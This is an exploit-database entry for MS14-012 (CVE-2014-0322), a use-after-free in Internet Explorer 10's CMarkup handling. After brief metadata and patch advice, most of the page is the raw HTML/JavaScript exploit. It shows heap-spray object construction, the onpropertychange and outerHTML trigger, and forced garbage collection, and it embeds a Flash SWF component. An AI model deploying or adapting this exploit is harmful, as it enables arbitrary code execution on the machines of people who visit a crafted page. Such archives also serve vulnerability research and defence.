MS14-012 Internet Explorer CMarkup Use-After-Free

vendor:

Internet Explorer

by:

Jean-Jamil Khalife

9,3

CVSS

HIGH

Use-After-Free

416

CWE

Product Name: Internet Explorer

Affected Version From: IE 10

Affected Version To: IE 10

Patch Exists: YES

Related CWE: CVE-2014-0322

CPE: a:microsoft:internet_explorer:10

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 SP1 x64 (fr, en)

2014

MS14-012 Internet Explorer CMarkup Use-After-Free

MS14-012 is a vulnerability in Internet Explorer CMarkup which allows an attacker to execute arbitrary code in the context of the current user by exploiting a use-after-free vulnerability. The vulnerability is caused due to a use-after-free error when handling CMarkup objects in Internet Explorer, which can be exploited to execute arbitrary code by tricking a user into visiting a specially crafted web page. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code in the context of the current user.

Mitigation:

Microsoft has released a security update to address this vulnerability. Users are advised to apply the necessary update.

Source

Exploit-DB raw data:

<!--
 MS14-012 Internet Explorer CMarkup Use-After-Free
 Vendor Homepage: http://www.microsoft.com
 Version: IE 10
 Date: 2014-03-31 
 Exploit Author: Jean-Jamil Khalife
 Tested on: Windows 7 SP1 x64 (fr, en)
 Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
 Home: http://www.hdwsec.fr
 Blog : http://www.hdwsec.fr/blog/
 MS14-012 / CVE-2014-0322

 Generation:
 	c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf

 Exploit-DB Mirror:  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32851-AsXploit.as

-->

<html>
<head>
</head>
<body>

<script>

var g_arr = [];
var arrLen = 0x250;

function dword2data(dword)
{
	var d = Number(dword).toString(16);
	while (d.length < 8)
		d = '0' + d;

	return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}

function eXpl()
{
    var a=0;

    for (a=0; a < arrLen; a++) {
        g_arr[a] = document.createElement('div');
    }
	
	// Build a new object
	var b = dword2data(0x19fffff3);
    while (b.length < 0x360)
	{
		// mov     eax,dword ptr [esi+98h]
		// ...
		// mov     eax,dword ptr [eax+8]
		// and     dword ptr [eax+2F0h],0FFFFFFBFh
		if (b.length == (0x98 / 2))
		{
			b += dword2data(0x1a000010);
		}
		// mov     ecx,dword ptr [edx+94h]
		// mov     eax,dword ptr [ecx+0Ch]
		else if (b.length == (0x94 / 2))
		{
			b += dword2data(0x1a111111);
		}
		// mov     eax,dword ptr [edx+15Ch]
		// mov     ecx,dword ptr [eax+edx*8]
		else if (b.length == (0x15c / 2))
		{
			b += dword2data(0x42424242);
		}
		else
		{
			b += dword2data(0x19fffff3);
		}
	}
    
	var d = b.substring(0, ( 0x340 - 2 )/2);
    
	// trigger
	try{
        this.outerHTML=this.outerHTML
    } 
	catch(e){
		
	}
	
    CollectGarbage();

	// Replace freed object
    for (a=0; a < arrLen; a++)
    {
        g_arr[a].title = d.substring(0, d.length);
    }
}

// Trigger the vulnerability
function trigger()
{
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = eXpl;
    var c = document.createElement('SELECT');
    c = b.appendChild(c);
}



</script>
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>